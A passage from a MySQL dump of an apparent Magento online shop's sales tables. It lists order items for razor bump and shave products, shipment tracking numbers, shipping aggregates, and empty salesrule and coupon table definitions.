Solution Samples ','IT-M7'),(55,46,NULL,27.9900,NULL,1.0000,1,87,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(56,47,NULL,27.9900,NULL,1.0000,1,86,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(57,48,NULL,27.9900,NULL,1.0000,1,88,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(58,49,NULL,27.9900,NULL,1.0000,1,89,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(59,50,NULL,44.9900,NULL,2.0000,14,90,NULL,NULL,'Razor Bump Solution & Aloe Vera Shave Gel','IT-A7'),(60,51,NULL,27.9900,NULL,1.0000,1,94,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(61,52,NULL,6.9900,NULL,2.0000,89,92,NULL,NULL,'Razor Bumps Solution Samples ','IT-M7'),(62,52,NULL,27.9900,NULL,2.0000,1,93,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(63,53,NULL,27.9900,NULL,1.0000,1,91,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(64,54,NULL,27.9900,NULL,1.0000,1,95,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(65,55,NULL,27.9900,NULL,1.0000,1,96,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(66,56,NULL,27.9900,NULL,1.0000,1,97,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(67,56,NULL,44.9900,NULL,2.0000,14,98,NULL,NULL,'Razor Bump Solution & Aloe Vera Shave Gel','IT-A7'),(68,56,NULL,6.9900,NULL,3.0000,89,99,NULL,NULL,'Razor Bumps Solution Samples ','IT-M7'),(69,57,NULL,27.9900,NULL,1.0000,1,100,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(70,58,NULL,50.9800,1.0000,1.0000,673,101,NULL,NULL,'Razor Bumps Solution 8 oz.','IT-11141'),(71,59,NULL,27.9900,NULL,1.0000,1,102,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(72,60,NULL,27.9900,NULL,1.0000,1,103,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(73,61,NULL,6.9900,NULL,1.0000,89,104,NULL,NULL,'Razor Bumps Solution Samples ','IT-M7'),(74,61,NULL,39.9900,NULL,1.0000,93,105,NULL,NULL,'Dandruff Control Scalp Treatment','IT-11100'),(75,62,NULL,27.9900,NULL,1.0000,1,106,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(76,63,NULL,25.9900,1.0000,1.0000,496,107,NULL,NULL,'Aloe Vera Shave Gel','IT-41122'),(77,64,NULL,27.9900,NULL,1.0000,1,108,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(78,65,NULL,27.9900,NULL,1.0000,1,109,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(79,65,NULL,39.9900,NULL,1.0000,93,110,NULL,NULL,'Dandruff Control Scalp Treatment','IT-11100'),(80,66,NULL,27.9900,NULL,1.0000,1,111,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(81,66,NULL,6.9900,NULL,1.0000,89,112,NULL,NULL,'Razor Bumps Solution Samples ','IT-M7'),(82,67,NULL,27.9900,NULL,1.0000,1,113,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(83,68,NULL,27.9900,NULL,4.0000,1,114,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(84,69,NULL,27.9900,NULL,1.0000,1,115,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(85,70,NULL,27.9900,NULL,1.0000,1,116,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(86,71,NULL,27.9900,NULL,1.0000,1,117,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(87,72,NULL,27.9900,NULL,1.0000,1,118,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(88,73,NULL,27.9900,NULL,1.0000,1,119,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(89,74,NULL,27.9900,NULL,2.0000,1,120,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(90,75,NULL,27.9900,NULL,1.0000,1,121,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(91,76,NULL,27.9900,NULL,1.0000,1,122,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(92,77,NULL,50.9800,1.0000,1.0000,673,123,NULL,NULL,'Razor Bumps Solution 8 oz.','IT-11141'),(93,78,NULL,39.9900,NULL,1.0000,14,125,NULL,NULL,'Razor Bump Solution & Aloe Vera Shave Gel','IT-A7'),(94,79,NULL,14.0000,1.0000,1.0000,496,124,NULL,NULL,'Aloe Vera Shave Gel','IT-41122'),(95,80,NULL,6.9900,NULL,2.0000,89,126,NULL,NULL,'Razor Bumps Solution Samples ','IT-M7'),(96,81,NULL,29.9900,NULL,1.0000,1,127,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(97,82,NULL,29.9900,NULL,2.0000,1,128,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(98,83,NULL,29.9900,NULL,1.0000,1,129,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(99,84,NULL,50.9800,1.0000,1.0000,673,130,NULL,NULL,'Razor Bumps Solution 8 oz.','IT-11141'),(100,85,NULL,50.9800,1.0000,2.0000,673,131,NULL,NULL,'Razor Bumps Solution 8 oz.','IT-11141'),(101,86,NULL,29.9900,NULL,2.0000,1,132,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(102,87,NULL,29.9900,NULL,1.0000,1,135,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(103,88,NULL,29.9900,NULL,2.0000,1,133,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(104,89,NULL,29.9900,NULL,1.0000,1,134,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(105,90,NULL,6.9900,NULL,1.0000,89,136,NULL,NULL,'Razor Bumps Solution Samples ','IT-M7'),(106,91,NULL,32.9900,NULL,1.0000,1,137,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140');

--
-- Table structure for table `sales_shipment_track`
--

CREATE TABLE `sales_shipment_track` (
  `entity_id` int unsigned NOT NULL COMMENT 'Entity ID',
  `parent_id` int unsigned NOT NULL COMMENT 'Parent ID',
  `weight` decimal(12,4) DEFAULT NULL COMMENT 'Weight',
  `qty` decimal(12,4) DEFAULT NULL COMMENT 'Qty',
  `order_id` int unsigned NOT NULL COMMENT 'Order ID',
  `track_number` text COMMENT 'Number',
  `description` text COMMENT 'Description',
  `title` varchar(255) DEFAULT NULL COMMENT 'Title',
  `carrier_code` varchar(32) DEFAULT NULL COMMENT 'Carrier Code',
  `created_at` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP COMMENT 'Created At',
  `updated_at` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP COMMENT 'Updated At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Sales Flat Shipment Track';

--
-- Dumping data for table `sales_shipment_track`
--

INSERT INTO `sales_shipment_track` VALUES (2,8,NULL,NULL,24,'1Z6X6W600316182239',NULL,'United Parcel Service','ups','2021-02-15 13:06:29','2021-02-15 13:06:29'),(3,9,NULL,NULL,29,'1Z6X6W600307398649',NULL,'United Parcel Service','ups','2021-02-15 13:15:23','2021-02-15 13:15:23'),(4,10,NULL,NULL,30,'1Z6X6W600304221067',NULL,'United Parcel Service','ups','2021-03-04 12:57:31','2021-03-04 12:57:31'),(5,11,NULL,NULL,33,'1Z6X6W600303395079',NULL,'United Parcel Service','ups','2021-03-22 11:43:26','2021-03-22 11:43:26'),(6,12,NULL,NULL,32,'1Z6X6W600321115515',NULL,'United Parcel Service','ups','2021-03-23 10:12:56','2021-03-23 10:12:56'),(7,13,NULL,NULL,34,'1Z6X6W600323426122',NULL,'United Parcel Service','ups','2021-03-25 10:03:27','2021-03-25 10:03:27'),(8,14,NULL,NULL,36,'1Z6X6W600331948937',NULL,'United Parcel Service','ups','2021-04-19 12:30:27','2021-04-19 12:30:27'),(9,15,NULL,NULL,35,'1Z6X6W600330927943',NULL,'United Parcel Service','ups','2021-04-19 23:27:40','2021-04-19 23:27:40'),(10,16,NULL,NULL,38,'1Z6X6W600304256306',NULL,'United Parcel Service','ups','2021-04-19 23:32:22','2021-04-19 23:32:22'),(11,17,NULL,NULL,39,'1Z6X6W600329487154',NULL,'United Parcel Service','ups','2021-04-19 23:38:32','2021-04-19 23:38:32'),(12,18,NULL,NULL,40,'1Z6X6W600308803118',NULL,'United Parcel Service','ups','2021-04-19 23:43:01','2021-04-19 23:43:01'),(13,19,NULL,NULL,41,'1Z6X6W600307053127',NULL,'United Parcel Service','ups','2021-04-19 23:47:32','2021-04-19 23:47:32'),(14,20,NULL,NULL,42,'1Z6X6W600305310334',NULL,'United Parcel Service','ups','2021-04-19 23:53:02','2021-04-19 23:53:02'),(15,21,NULL,NULL,37,'1Z6X6W600308758749',NULL,'United Parcel Service','ups','2021-04-23 08:57:35','2021-04-23 08:57:35'),(16,22,NULL,NULL,43,'1Z6X6W600323842173',NULL,'United Parcel Service','ups','2021-04-23 20:53:06','2021-04-23 20:53:06'),(17,23,NULL,NULL,44,'1Z6X6W600316544384',NULL,'United Parcel Service','ups','2021-05-18 09:49:23','2021-05-18 09:49:23'),(18,24,NULL,NULL,50,'1Z6X6W600334405991',NULL,'United Parcel Service','ups','2021-06-03 19:31:19','2021-06-03 19:31:19'),(19,25,NULL,NULL,51,'1Z6X6W600314848407',NULL,'United Parcel Service','ups','2021-06-06 03:59:44','2021-06-06 03:59:44'),(20,26,NULL,NULL,52,'1Z6X6W600322526203',NULL,'United Parcel Service','ups','2021-06-14 12:32:36','2021-06-14 12:32:36'),(21,27,NULL,NULL,53,'Test Number',NULL,'United Parcel Service','ups','2021-07-10 07:05:49','2021-07-10 07:05:49'),(22,28,NULL,NULL,55,'1Z6X6W600315107278',NULL,'United Parcel Service','ups','2021-08-27 17:17:35','2021-08-27 17:17:35'),(23,29,NULL,NULL,54,'1Z6X6W600312352482',NULL,'United Parcel Service','ups','2021-08-27 22:18:35','2021-08-27 22:18:35'),(24,30,NULL,NULL,56,'1Z6X6W600306148894',NULL,'United Parcel Service','ups','2021-09-07 11:58:09','2021-09-07 11:58:09'),(25,31,NULL,NULL,57,'1Z6X6W600313360506',NULL,'United Parcel Service','ups','2021-09-11 00:19:38','2021-09-11 00:19:38'),(26,32,NULL,NULL,60,'1Z6X6W600333877091',NULL,'United Parcel Service','ups','2021-09-13 12:54:48','2021-09-13 12:54:48'),(27,33,NULL,NULL,58,'1Z6X6W600300038942',NULL,'United Parcel Service','ups','2021-10-07 12:41:42','2021-10-07 12:41:42'),(28,34,NULL,NULL,65,'1Z6X6W600308086555',NULL,'United Parcel Service','ups','2021-10-13 15:39:51','2021-10-13 15:39:51'),(29,35,NULL,NULL,64,'1Z6X6W600310413366',NULL,'United Parcel Service','ups','2021-10-13 15:47:38','2021-10-13 15:47:38'),(30,36,NULL,NULL,63,'1Z6X6W600331419302',NULL,'United Parcel Service','ups','2021-10-13 15:53:38','2021-10-13 15:53:38'),(31,37,NULL,NULL,62,'1Z6X6W600339805719',NULL,'United Parcel Service','ups','2021-10-13 15:59:57','2021-10-13 15:59:57'),(32,38,NULL,NULL,61,'1Z6X6W600308043378',NULL,'United Parcel Service','ups','2021-10-13 16:06:08','2021-10-13 16:06:08'),(33,40,NULL,NULL,66,'1Z6X6W600303792603',NULL,'United Parcel Service','ups','2021-10-19 12:14:24','2021-10-19 12:14:24'),(34,41,NULL,NULL,67,'1Z6X6W600314475417',NULL,'United Parcel Service','ups','2021-11-18 22:03:51','2021-11-18 22:03:51'),(35,42,NULL,NULL,68,'1Z6X6W600320870148',NULL,'United Parcel Service','ups','2021-11-20 13:34:57','2021-11-20 13:34:57'),(36,43,NULL,NULL,69,'1Z6X6W600316781421',NULL,'United Parcel Service','ups','2021-12-09 18:53:18','2021-12-09 18:53:18'),(37,51,NULL,NULL,79,'1Z6X6W600314339510',NULL,'United Parcel Service','ups','2022-02-24 19:49:04','2022-02-24 19:49:04'),(38,52,NULL,NULL,78,'1Z6X6W600329296459',NULL,'United Parcel Service','ups','2022-02-24 19:56:41','2022-02-24 19:56:41'),(39,53,NULL,NULL,77,'1Z6X6W600335225862',NULL,'United Parcel Service','ups','2022-02-24 20:43:44','2022-02-24 20:43:44'),(40,54,NULL,NULL,80,'1Z6X6W600309399144',NULL,'United Parcel Service','ups','2022-03-07 12:10:36','2022-03-07 12:10:36'),(41,55,NULL,NULL,81,'1Z6X6W600324465507',NULL,'United Parcel Service','ups','2022-03-07 12:16:19','2022-03-07 12:16:19'),(42,56,NULL,NULL,82,'1Z6X6W600316790751',NULL,'United Parcel Service','ups','2022-03-10 22:04:30','2022-03-10 22:04:30'),(43,57,NULL,NULL,83,'1Z6X6W600329294522',NULL,'United Parcel Service','ups','2022-03-11 22:58:41','2022-03-11 22:58:41'),(44,58,NULL,NULL,84,'1Z6X6W600335185334',NULL,'United Parcel Service','ups','2022-03-15 11:37:05','2022-03-15 11:37:05'),(45,59,NULL,NULL,85,'1Z6X6W600306141560',NULL,'United Parcel Service','ups','2022-03-15 11:47:37','2022-03-15 11:47:37'),(46,60,NULL,NULL,86,'1Z6X6W600338892341',NULL,'United Parcel Service','ups','2022-03-17 18:55:54','2022-03-17 18:55:54'),(47,61,NULL,NULL,87,'1Z6X6W600336739556',NULL,'United Parcel Service','ups','2022-03-24 15:49:13','2022-03-24 15:49:13'),(48,62,NULL,NULL,88,'1Z6X6W600331530968',NULL,'United Parcel Service','ups','2022-03-24 16:22:17','2022-03-24 16:22:17'),(49,64,NULL,NULL,90,'1Z6X6W600325162387',NULL,'United Parcel Service','ups','2022-04-15 12:45:59','2022-04-15 12:45:59'),(50,65,NULL,NULL,91,'1Z6X6W600328410399',NULL,'United Parcel Service','ups','2022-04-15 12:52:02','2022-04-15 12:52:02'),(51,66,NULL,NULL,92,'1Z6X6W600316416807',NULL,'United Parcel Service','ups','2022-05-30 12:00:36','2022-05-30 12:00:36'),(52,67,NULL,NULL,93,'1Z6X6W600325933446',NULL,'United Parcel Service','ups','2022-07-05 06:21:11','2022-07-05 06:21:11'),(53,68,NULL,NULL,94,'1Z6X6W600324602653',NULL,'United Parcel Service','ups','2022-07-11 02:28:25','2022-07-11 02:28:25'),(54,69,NULL,NULL,95,'1Z6X6W600329777671',NULL,'United Parcel Service','ups','2022-07-25 12:17:31','2022-07-25 12:17:31'),(55,70,NULL,NULL,96,'1Z6X6W600317750837',NULL,'United Parcel Service','ups','2022-08-01 12:53:26','2022-08-01 12:53:26'),(56,71,NULL,NULL,97,'1Z6X6W600325331480',NULL,'United Parcel Service','ups','2022-08-02 11:03:09','2022-08-02 11:03:09'),(57,72,NULL,NULL,98,'1Z6X6W600331961494',NULL,'United Parcel Service','ups','2022-08-11 13:01:48','2022-08-11 13:01:48'),(58,73,NULL,NULL,99,'1Z6X6W600331191709',NULL,'United Parcel Service','ups','2022-08-14 12:35:43','2022-08-14 12:35:43'),(59,74,NULL,NULL,100,'1Z6X6W600318359241',NULL,'United Parcel Service','ups','2022-08-16 04:22:01','2022-08-16 04:22:01'),(60,75,NULL,NULL,101,'1Z6X6W600335026112',NULL,'United Parcel Service','ups','2022-09-01 17:03:16','2022-09-01 17:03:16'),(61,76,NULL,NULL,102,'1Z6X6W600335548728',NULL,'United Parcel Service','ups','2022-09-09 17:11:58','2022-09-09 17:11:58'),(62,77,NULL,NULL,103,'1Z6X6W600336885755',NULL,'United Parcel Service','ups','2022-10-14 15:08:28','2022-10-14 15:08:28'),(63,78,NULL,NULL,105,'1Z6X6W600303171677',NULL,'United Parcel Service','ups','2022-10-28 19:56:50','2022-10-28 19:56:50'),(64,79,NULL,NULL,104,'1Z9E1E990397473054',NULL,'United Parcel Service','ups','2022-10-28 20:11:47','2022-10-28 20:11:47'),(65,80,NULL,NULL,106,'1z6x6w600306608904',NULL,'United Parcel Service','ups','2022-11-24 19:43:50','2022-11-24 19:43:50'),(66,81,NULL,NULL,107,'1Z6X6W600304989720',NULL,'United States Postal Service','usps','2022-12-06 13:12:03','2022-12-06 13:12:03'),(67,82,NULL,NULL,108,'1Z6X6W600339120584',NULL,'United Parcel Service','ups','2022-12-19 12:45:47','2022-12-19 12:45:47'),(68,83,NULL,NULL,109,'1Z6X6W600332184804',NULL,'United Parcel Service','ups','2022-12-27 13:10:07','2022-12-27 13:10:07'),(69,84,NULL,NULL,110,'1Z6X6W600335881215',NULL,'United Parcel Service','ups','2022-12-28 14:35:49','2022-12-28 14:35:49'),(70,85,NULL,NULL,111,'1Z6X6W600313174959',NULL,'United Parcel Service','ups','2022-12-29 13:32:28','2022-12-29 13:32:28'),(71,86,NULL,NULL,112,'1Z6X6W600333505821',NULL,'United Parcel Service','ups','2023-01-05 04:26:42','2023-01-05 04:26:42'),(72,87,NULL,NULL,115,'1Z6X6W600303851816',NULL,'United Parcel Service','ups','2023-02-22 15:34:54','2023-02-22 15:34:54'),(73,89,NULL,NULL,114,'1Z6X6W600336075648',NULL,'United Parcel Service','ups','2023-02-22 15:48:24','2023-02-22 15:48:24'),(74,90,NULL,NULL,116,'1Z3yo76R10x7Y325748',NULL,'United Parcel Service','ups','2023-03-03 03:39:43','2023-03-03 03:39:43'),(75,91,NULL,NULL,117,'1Z6X6W600317165827',NULL,'United Parcel Service','ups','2023-03-16 20:45:30','2023-03-16 20:45:30');

--
-- Table structure for table `sales_shipping_aggregated`
--

CREATE TABLE `sales_shipping_aggregated` (
  `id` int unsigned NOT NULL COMMENT 'ID',
  `period` date DEFAULT NULL COMMENT 'Period',
  `store_id` smallint unsigned DEFAULT NULL COMMENT 'Store ID',
  `order_status` varchar(50) DEFAULT NULL COMMENT 'Order Status',
  `shipping_description` varchar(255) DEFAULT NULL COMMENT 'Shipping Description',
  `orders_count` int NOT NULL DEFAULT '0' COMMENT 'Orders Count',
  `total_shipping` decimal(20,4) DEFAULT NULL COMMENT 'Total Shipping',
  `total_shipping_actual` decimal(20,4) DEFAULT NULL COMMENT 'Total Shipping Actual'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Sales Shipping Aggregated';

--
-- Dumping data for table `sales_shipping_aggregated`
--

INSERT INTO `sales_shipping_aggregated` VALUES (1,'2020-09-25',1,'processing','Free Shipping - Free',1,0.0000,0.0000),(2,'2020-10-29',1,'complete','Flat Rate - Fixed',1,5.0000,5.0000),(3,'2020-10-30',1,'complete','Flat Rate - Fixed',1,5.0000,5.0000),(4,'2020-09-25',0,'processing','Free Shipping - Free',1,0.0000,0.0000),(5,'2020-10-29',0,'complete','Flat Rate - Fixed',1,5.0000,5.0000),(6,'2020-10-30',0,'complete','Flat Rate - Fixed',1,5.0000,5.0000);

--
-- Table structure for table `sales_shipping_aggregated_order`
--

CREATE TABLE `sales_shipping_aggregated_order` (
  `id` int unsigned NOT NULL COMMENT 'ID',
  `period` date DEFAULT NULL COMMENT 'Period',
  `store_id` smallint unsigned DEFAULT NULL COMMENT 'Store ID',
  `order_status` varchar(50) DEFAULT NULL COMMENT 'Order Status',
  `shipping_description` varchar(255) DEFAULT NULL COMMENT 'Shipping Description',
  `orders_count` int NOT NULL DEFAULT '0' COMMENT 'Orders Count',
  `total_shipping` decimal(20,4) DEFAULT NULL COMMENT 'Total Shipping',
  `total_shipping_actual` decimal(20,4) DEFAULT NULL COMMENT 'Total Shipping Actual'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Sales Shipping Aggregated Order';

--
-- Dumping data for table `sales_shipping_aggregated_order`
--

INSERT INTO `sales_shipping_aggregated_order` VALUES (1,'2020-09-16',1,'processing','Free Shipping - Free',1,0.0000,0.0000),(2,'2020-10-17',1,'complete','Flat Rate - Fixed',1,5.0000,5.0000),(3,'2020-10-20',1,'processing','Flat Rate - Fixed',1,5.0000,NULL),(4,'2020-10-23',1,'processing','Flat Rate - Fixed',1,5.0000,NULL),(5,'2020-10-30',1,'complete','Flat Rate - Fixed',1,5.0000,5.0000),(8,'2020-09-16',0,'processing','Free Shipping - Free',1,0.0000,0.0000),(9,'2020-10-17',0,'complete','Flat Rate - Fixed',1,5.0000,5.0000),(10,'2020-10-20',0,'processing','Flat Rate - Fixed',1,5.0000,NULL),(11,'2020-10-23',0,'processing','Flat Rate - Fixed',1,5.0000,NULL),(12,'2020-10-30',0,'complete','Flat Rate - Fixed',1,5.0000,5.0000);

--
-- Table structure for table `salesrule`
--

CREATE TABLE `salesrule` (
  `rule_id` int unsigned NOT NULL COMMENT 'Entity ID',
  `name` varchar(255) DEFAULT NULL COMMENT 'Name',
  `description` text COMMENT 'Description',
  `from_date` date DEFAULT NULL COMMENT 'From',
  `to_date` date DEFAULT NULL COMMENT 'To',
  `uses_per_customer` int NOT NULL DEFAULT '0' COMMENT 'Uses Per Customer',
  `is_active` smallint NOT NULL DEFAULT '0' COMMENT 'Is Active',
  `conditions_serialized` mediumtext COMMENT 'Conditions Serialized',
  `actions_serialized` mediumtext COMMENT 'Actions Serialized',
  `stop_rules_processing` smallint NOT NULL DEFAULT '1' COMMENT 'Stop Rules Processing',
  `is_advanced` smallint unsigned NOT NULL DEFAULT '1' COMMENT 'Is Advanced',
  `product_ids` text COMMENT 'Product Ids',
  `sort_order` int unsigned NOT NULL DEFAULT '0' COMMENT 'Sort Order',
  `simple_action` varchar(32) DEFAULT NULL COMMENT 'Simple Action',
  `discount_amount` decimal(12,4) NOT NULL DEFAULT '0.0000' COMMENT 'Discount Amount',
  `discount_qty` decimal(12,4) DEFAULT NULL COMMENT 'Discount Qty',
  `discount_step` int unsigned NOT NULL DEFAULT '0' COMMENT 'Discount Step',
  `apply_to_shipping` smallint unsigned NOT NULL DEFAULT '0' COMMENT 'Apply To Shipping',
  `times_used` int unsigned NOT NULL DEFAULT '0' COMMENT 'Times Used',
  `is_rss` smallint NOT NULL DEFAULT '0' COMMENT 'Is Rss',
  `coupon_type` smallint unsigned NOT NULL DEFAULT '1' COMMENT 'Coupon Type',
  `use_auto_generation` smallint NOT NULL DEFAULT '0' COMMENT 'Use Auto Generation',
  `uses_per_coupon` int NOT NULL DEFAULT '0' COMMENT 'User Per Coupon',
  `simple_free_shipping` smallint unsigned DEFAULT NULL COMMENT 'Simple Free Shipping'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Salesrule';

--
-- Dumping data for table `salesrule`
--


--
-- Table structure for table `salesrule_coupon`
--

CREATE TABLE `salesrule_coupon` (
  `coupon_id` int unsigned NOT NULL COMMENT 'Coupon ID',
  `rule_id` int unsigned NOT NULL COMMENT 'Rule ID',
  `code` varchar(255) DEFAULT NULL COMMENT 'Code',
  `usage_limit` int unsigned DEFAULT NULL COMMENT 'Usage Limit',
  `usage_per_customer` int unsigned DEFAULT NULL COMMENT 'Usage Per Customer',
  `times_used` int unsigned NOT NULL DEFAULT '0' COMMENT 'Times Used',
  `expiration_date` datetime DEFAULT NULL COMMENT 'Expiration Date',
  `is_primary` smallint unsigned DEFAULT NULL COMMENT 'Is Primary',
  `created_at` timestamp NULL DEFAULT NULL COMMENT 'Coupon Code Creation Date',
  `type` smallint DEFAULT '0' COMMENT 'Coupon Code Type',
  `generated_by_dotmailer` smallint DEFAULT NULL COMMENT '1 = Generated by dotmailer'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Salesrule Coupon';

--
-- Dumping data for table `salesrule_coupon`
--


--
-- Table structure for table `salesrule_coupon_aggregated`
--

CREATE TABLE `salesrule_coupon_aggregated` (
  `id` int unsigned NOT NULL COMMENT 'ID',
  `period` date NOT NULL COMMENT 'Period',
  `store_id` smallint unsigned DEFAULT NULL COMMENT 'Store ID',
  `order_status` varchar(50) DEFAULT NULL COMMENT 'Order Status',
  `coupon_code` varchar(50) DEFAULT NULL COMMENT 'Coupon Code',
  `coupon_uses` int NOT NULL DEFAULT '0' COMMENT 'Coupon Uses',
  `subtotal_amount` decimal(20,4) NOT NULL DEFAULT '0.0000' COMMENT 'Subtotal Amount',
  `discount_amount` decimal(12,4) NOT NULL DEFAULT '0.0000' COMMENT 'Discount Amount',
  `total_amount` decimal(20,4) NOT NULL DEFAULT '0.0000' COMMENT 'Total Amount',
  `subtotal_amount_actual` decimal(20,4) NOT NULL DEFAULT '0.0000' COMMENT 'Subtotal Amount Actual',
  `discount_amount_actual` decimal(12,4) NOT NULL DEFAULT '0.0000' COMMENT 'Discount Amount Actual',
  `total_amount_actual` decimal(20,4) NOT NULL DEFAULT '0.0000' COMMENT 'Total Amount Actual',
  `rule_name` varchar(255) DEFAULT NULL COMMENT 'Rule Name'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Coupon Aggregated';

--
-- Dumping data for table `salesrule_coupon_aggregated`
--


--
-- Table structure for table `salesrule_coupon_aggregated_order`
--

CREATE TABLE `salesrule_coupon_aggregated_order` (
  `id` int unsigned NOT NULL COMMENT 'ID',
  `period` date NOT NULL COMMENT 'Period',
  `store_id` smallint unsigned DEFAULT NULL COMMENT 'Store ID',
  `order_status` varchar(50) DEFAULT NULL COMMENT 'Order Status',
  `coupon_code` varchar(50) DEFAULT NULL COMMENT 'Coupon Code',
  `coupon_uses` int NOT NULL DEFAULT '0' COMMENT 'Coupon Uses',
  `subtotal_amount` decimal(20,4) NOT NULL DEFAULT '0.0000' COMMENT 'Subtotal Amount',
  `discount_amount` decimal(12,4) NOT NULL DEFAULT '0.0000' COMMENT 'Discount Amount',
  `total_amount` decimal(20,4) NOT NULL DEFAULT '0.0000' COMMENT 'Total Amount',
  `rule_name` varchar(255) DEFAULT NULL COMMENT 'Rule Name'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Coupon Aggregated Order';

--
-- Dumping data for table `salesrule_coupon_aggregated_order`
--


--
-- Table structure for table `salesrule_coupon_aggregated_updated`
--

CREATE TABLE `salesrule_coupon_aggregated_updated` (
  `id` int unsigned NOT NULL COMMENT 'ID',
  `period` date NOT NULL COMMENT 'Period',
  `store_id` smallint unsigned DEFAULT NULL COMMENT 'Store ID',
  `order_status` varchar(50) DEFAULT NULL COMMENT 'Order Status',
  `coupon_code` varchar(50) DEFAULT NULL COMMENT 'Coupon Code',
  `coupon_uses` int NOT NULL DEFAULT '0' COMMENT 'Coupon Uses',
  `subtotal_amount` decimal(20,4) NOT NULL DEFAULT '0.0000' COMMENT 'Subtotal Amount',
  `discount_amount` decimal(12,4) NOT NULL DEFAULT '0.0000' COMMENT 'Discount Amount',
  `total_amount` decimal(20,4) NOT NULL DEFAULT '0.0000' COMMENT 'Total Amount',
  `subtotal_amount_actual` decimal(20,4) NOT NULL DEFAULT '0.0000' COMMENT 'Subtotal Amount Actual',
  `discount_amount_actual` decimal(12,4) NOT NULL DEFAULT '0.0000' COMMENT 'Discount Amount Actual',
  `total_amount_actual` decimal(20,4) NOT NULL DEFAULT '0.0000' COMMENT 'Total Amount Actual',
  `rule_name` varchar(255) DEFAULT NULL COMMENT 'Rule Name'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Salesrule Coupon Aggregated Updated';

--
-- Dumping data for table `salesrule_coupon_aggregated_updated`
--


--
-- Table structure for table `salesrule_coupon_usage`
--

CREATE TABLE `salesrule_coupon_usage` (
  `coupon_id` int unsigned NOT NULL COMMENT 'Coupon ID',
  `customer_id` int unsigned NOT NULL COMMENT 'Customer ID',
  `times_used` int unsigned NOT NULL DEFAULT '0' COMMENT 'Times Used'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Salesrule Coupon Usage';

--
-- Dumping data for table `salesrule_coupon_usage`
--


--
-- Table structure for table `salesrule_customer`
--

CREATE TABLE `salesrule_customer` (
  `rule_customer_id` int unsigned NOT NULL COMMENT 'Rule Customer ID',
  `rule_id` int unsigned NOT NULL DEFAULT '0' COMMENT 'Rule ID',
  `customer_id` int unsigned NOT NULL DEFAULT '0' COMMENT 'Customer ID',
  `times_used` smallint unsigned NOT NULL DEFAULT '0' COMMENT 'Times Used'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Salesrule Customer';

--
-- Dumping data for table `salesrule_customer`
--


--
-- Table structure for table `salesrule_customer_group`
--

CREATE TABLE `salesrule_customer_group` (
  `rule_id` int unsigned NOT NULL COMMENT 'Rule ID',
  `customer_group_id` int unsigned NOT NULL COMMENT 'Customer Group ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Sales Rules To Customer Groups Relations';

--
-- Dumping data for table `salesrule_customer_group`
--


--
-- Table structure for table `salesrule_label`
--

CREATE TABLE `salesrule_label` (
  `label_id` int unsigned NOT NULL COMMENT 'Label ID',
  `rule_id` int unsigned NOT NULL COMMENT 'Rule ID',
  `store_id` smallint unsigned NOT NULL COMMENT 'Store ID',
  `label` varchar(255) DEFAULT NULL COMMENT 'Label'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Salesrule Label';

--
-- Dumping data for table `salesrule_label`
--


--
-- Table structure for table `salesrule_product_attribute`
--

CREATE TABLE `salesrule_product_attribute` (
  `rule_id` int unsigned NOT NULL COMMENT 'Rule ID',
  `website_id` smallint unsigned NOT NULL COMMENT 'Website ID',
  `customer_group_id` int unsigned NOT NULL COMMENT 'Customer Group ID',
  `attribute_id` smallint unsigned NOT NULL COMMENT 'Attribute ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Salesrule Product Attribute';

--
-- Dumping data for table `salesrule_product_attribute`
--


--
